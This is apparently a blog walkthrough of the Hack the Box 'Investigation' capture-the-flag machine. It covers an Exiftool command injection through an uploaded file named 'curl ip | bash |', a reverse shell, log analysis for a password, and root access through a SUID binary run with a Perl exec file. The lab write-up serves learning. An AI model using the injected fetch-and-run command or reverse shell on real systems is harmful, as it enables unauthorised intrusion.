In this post, I would like to share a walkthrough of the Investigation Machine from Hack the Box


This room will be considered an Insane machine on Hack the Box

What will you gain from the Investigation machine?


For the user flag, you will need to abuse a website that accepts a user-uploaded image which we will run Exiftool on the website. As a result, we found an older version of Exiftool that vulnerable to command injection.


As for the root flag, you need to find a logs on the Windows Event and analyze the log to obtain a password which we will make use of the malware that will runs as root.

Information Gathering on Investigation Machine


Once we have started the VPN connection which requires a download from Hackthebox, we can start the information gathering on the machine by executing the command nmap -sC -sV -p- <IP Address> -PN


Let’s access the website interface


However, the website doesn’t have many things to explore with


From us roaming just now, we are only aware of the potential username


However, there’s an upload function in the Free Service section.


Let’s find a jpg file and use it for uploading on the application.


As shown in the screenshot above, we have uploaded the jpg file to the application

Exiftool vulnerability


I did notice that there is Exiftool version is been vulnerable and the exploit can be found here


We can try to cp the jpg file to some command injection which will try to curl a file from our attacker’s machine


Let’s start our Python server


We also can insert the reverse shell into a new file that saves in HTML format


Let’s execute our listener with pwncat


Therefore, let’s upload the file that name as curl ip | bash |


It will look something like the above on burpsuite request


Once the file is successfully uploaded to the application, we will be getting the output as shown above.


When we are looking back on the Python server, it shows that the application is retrieving our HTML file

Text

Description automatically generated

Boom! We managed to obtain the reverse shell connection back to us

Text

Description automatically generated

We notice that the only user available on the machine is smorton

Text

Description automatically generated

Let’s upload pspy64 into our victim’s machine to see any process that we can abuse


We should be giving the execution permission to the file and running it


From the pspy64 output, i notice that there’s a file that looks suspicious which is /var/www/html


As a result, let’s access the folder to see what is stored inside there.


There’s nothing saved inside the analysed_log file


It’s hard to read when you try to string the file content


The msg file is a CDFV2 Microsoft Outlook Message

Text

Description automatically generated

Therefore, we should convert the msg file to eml file format

Graphical user interface

Description automatically generated with medium confidence

We can read the content of the file by opening either Outlook or LibreOffice

Graphical user interface, text, application

Description automatically generated

Next, we need to unzip the file and managed to find a password from all those information

Text

Description automatically generated with medium confidence

We can read the user flag by typing the “cat user.txt” command

Escalate to Root Privileges Access

Text

Description automatically generated

As usual, we can find any malicious SUID binary by running the command “sudo -l”

Text

Description automatically generated

We can analyze the SUID binary by using IDA pro or Ghidra but I will just use string to capture the useful information from the file

Text

Description automatically generated

As a result, let’s create a perl file that will contain the content of exec(“any command”)


Let’s execute the SUID binary with the perl file and passcode


We can read the root flag by typing the “cat root.txt” command

Extra Information